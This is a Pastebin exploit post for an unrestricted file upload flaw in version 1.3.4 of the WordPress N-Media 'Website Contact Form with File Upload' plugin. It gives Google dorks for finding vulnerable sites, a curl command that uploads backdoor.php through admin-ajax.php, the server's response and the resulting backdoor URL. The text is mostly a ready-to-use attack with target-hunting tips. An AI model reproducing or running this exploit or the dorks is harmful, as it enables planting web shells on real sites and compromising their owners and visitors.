Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
- # Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
- # Dork Google: index of website-contact-form-with-file-upload
- index of /uploads/contact_files/
- # Tested on : Linux BackBox 4.0 / curl 7.35.0
- #####################
- # Info :
- The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
- ######################
- # PoC:
- curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
- Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
- ######################
- # Backdoor Location:
- http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement